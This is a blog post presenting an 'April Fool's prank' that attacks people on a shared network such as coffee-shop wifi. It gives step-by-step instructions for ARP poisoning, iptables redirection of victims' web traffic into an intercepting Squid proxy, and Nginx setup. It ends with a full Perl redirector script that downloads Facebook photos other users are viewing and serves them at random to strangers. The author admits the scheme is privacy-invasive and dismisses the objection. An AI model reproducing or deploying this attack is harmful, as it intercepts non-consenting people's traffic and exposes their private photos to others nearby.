Posted by Wicher 
Topic: It’s not too late for posts about April Fool’s Day pranks I hope?
In the tradition of the Upsidedownternet this April 1st I had some fun with Facebook addicts.
You may not be aware of the fact that any picture on facebook is publicly accessible. Yes, it is. There’s no authentication & authorisation whatsoever. Handling those in a scalable way would ramp up costs. Your privacy is not worth those costs. Contrary to the impression you are trying to deliver through your profile, you are not important. Happy shareholders are important!
Due to this fact I just need to know the URLs of your pictures. From the URL I can determine whether it’s a profile picture, profile picture thumbnail, photo, photo thumbnail, etc.
Wouldn’t it be fun to mix the pictures of the facebook page you are currently viewing with those from facebook pages others are viewing? So when you’re browsing your friend’s albums, you not only see his pictures but pictures from other peoples’ albums too, and vice versa?
The pictures may be requested by the guy across the bar, or by the girl one floor down in the library, or by anyone on the same network as you are — all of you are browsing together with the people in your physical vicinity, sharing whatever pictures you encounter! It’s beyond Facebook. It’s crowdbrowsing. It’s Megafacebook.
While you may not know these newly inserted friends, you might get to. Maybe you bump into one another at the toilets, or at the counter.
“Why is everyone staring at me like that?” you naively wonder. (They’ve seen those pictures).
“Does she know that I know about those pictures of her and her friends? But wait… what might she know about me?”, your paranoid mind ponders.
It’s all about what you think of others and what others think of you. Total absorption. Now that’s what I call social networking. All hail Facebook Social!
Give the wifi crowd at your local coffeeshop the pleasure of learning a little bit more about eachothers lives and friends.
Get to work
You need:
- one network vulnerable to ARP poison routing (that’s most of them) or one network which you already control anyway. Make everyone route their traffic through your machine.
- one installment of the Nginx web server, configured with
--with-http_random_index_module. I use the 0.8.3x series. - one installment of the Squid http proxy server. I use the 3.1 series.
- Perl and LWP::Simple.
Set up Nginx
Create some directories to hold the images:
mkdir /var/www/facemix/{albums,photos,photosthumb,smoelen,smoelenthumb}
Tell Nginx to respond to requests for those directories by randomly serving one of the files in them:
location ~ ^/facemix/([^/]+)(/?.*)$ {
alias /var/www/facemix/$1/$2;
random_index on;
expires -1;
}
You need the ‘expires -1′ to avoid caching. If proxies or user agents were to cache the results, they wouldn’t be very random anymore now would they.
Stick some files in there and test your installation.
Set up Squid
Set up squid in interception mode. If you’re not NATting the routed traffic, set it to run on port 80. If Nginx is already listening on that socket, make Nginx listen on some other port, or localhost only, while running squid on port 80 but only on the external interface.
Set up networking
This is for iptables.
- You’re NATting the pwned hosts. Run something along the lines of
iptables -t nat -A PREROUTING -i $INTERFACE -p tcp --dport 80 -j REDIRECT --to-port 8080
to redirect all traffic incoming on $INTERFACE and destined for port 80 to port 8080, which is where you need squid to listen on. - You’re doing 2-way ARP poisoning (cheers!). Run something along the lines of
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j DNAT --to-destination $YOURIP
Squid needs to run on port 80 on interface with IP $YOURIP.
Check Squid’s logs to verify that requests are intercepted successfully.
Run the redirection script
I don’t touch Perl very often, and cobbling together this script made me remember why that is. It’s very usable as a means of frightening little kids.
In a nutshell, what my redirector script does is
- determine whether the URL fed to it by Squid is a facebook picture url;
- if so, and if we don’t have that picture yet, fork off to download it;
- point Squid to a random picture of the same type (served by Nginx).
I like the forking. I dislike the iffed regexes which could probably be condensed into one but then it wouldn’t be ‘cobbling together’ anymore.
Adjust the variables for your setup and tell Squid about the script (eg url_rewrite_program /usr/local/lib/facemix-squidredir.pl).
The Facebook logo will change to reflect the fact that the users are now browsing facebook in Social! mode.
One further note: This is privacy-invasive. I brush away my moral doubts by stating that anyone who signed away their privacy rights when joining facebook AND AT THE SAME TIME entertains any expectations with respect to privacy,
« inhale »
… is utterly mental and has completely lost any and all sense of proportionality. If you care about privacy, why use a service which lets you view any picture of any user regardless of who you are? Who are you kidding?
If you’re still reading, here’s the script:
#!/usr/bin/perl -w use LWP::Simple; $WEBROOT = 'http://localhost/facemix/'; $WEBDIR = '/var/www/facemix/'; $CHANCE = 5; #One in X requests gets mixed $SIG{CHLD} = 'IGNORE'; $|=1; while (<>) { local @reqfrags = split(/ /, $_); local $url = @reqfrags[0]; if ($url =~ /(^http:\/\/.*.fbcdn.net\/rsrc.php\/z7VU4\/hash\/66ad7upf.png$)/) { print "http://smormedia.gavagai.nl/2010/04/FacebookSocial2.png\n"; } elsif (($url =~ /(^http:\/\/photos-.*.fbcdn.net\/.*\/.*_n.jpg$)/) || ($url =~ /(^http:\/\/photos-.*.fbcdn.net\/.*\/n.*.jpg$)/)) { &mixurl('photos/',$url); } elsif (($url =~ /(^http:\/\/photos-.*.fbcdn.net\/.*\/.*_s.jpg$)/) || ($url =~ /(^http:\/\/photos-.*.fbcdn.net\/.*\/s.*.jpg$)/)) { &mixurl('photosthumb/',$url); } elsif (($url =~ /(^http:\/\/profile.*.fbcdn.net\/.*\/.*_n.jpg$)/) || ($url =~ /(^http:\/\/profile.*.fbcdn.net\/.*\/n.*.jpg$)/)) { &mixurl('smoelen/',$url); } elsif (($url =~ /(^http:\/\/profile.*.fbcdn.net\/.*\/.*_q.jpg$)/) || ($url =~ /(^http:\/\/profile.*.fbcdn.net\/.*\/q.*.jpg$)/)) { &mixurl('smoelenthumb/',$url); } elsif (($url =~ /(^http:\/\/photos-.*.fbcdn.net\/.*\/.*_a.jpg$)/) || ($url =~ /(^http:\/\/photos-.*.fbcdn.net\/.*\/a.*.jpg$)/)) { &mixurl('albums/',$url); } else { print $url."\n"; } } sub mixurl { #args: subdir, url local $vork = fork(); if ($vork == 0) {&getit($_[0], $_[1]);} if (int(rand($CHANCE)) == 0) { print $WEBROOT.$_[0]."\n"; } else { print $_[1]."\n"; } } sub getit { #args: subdir, url local $storedir = $WEBDIR.$_[0]; local @urlfrags = split(/\//, $_[1]); local $fname = pop(@urlfrags); if (!stat($storedir.$fname)) { getstore($_[1],$storedir.'._tmp-'.$fname); rename($storedir.'._tmp-'.$fname, $storedir.$fname); } exit; }
Tags: aprilfools, en_GB, facebook, security, squid, upsidedownternet, url_rewrite_program —
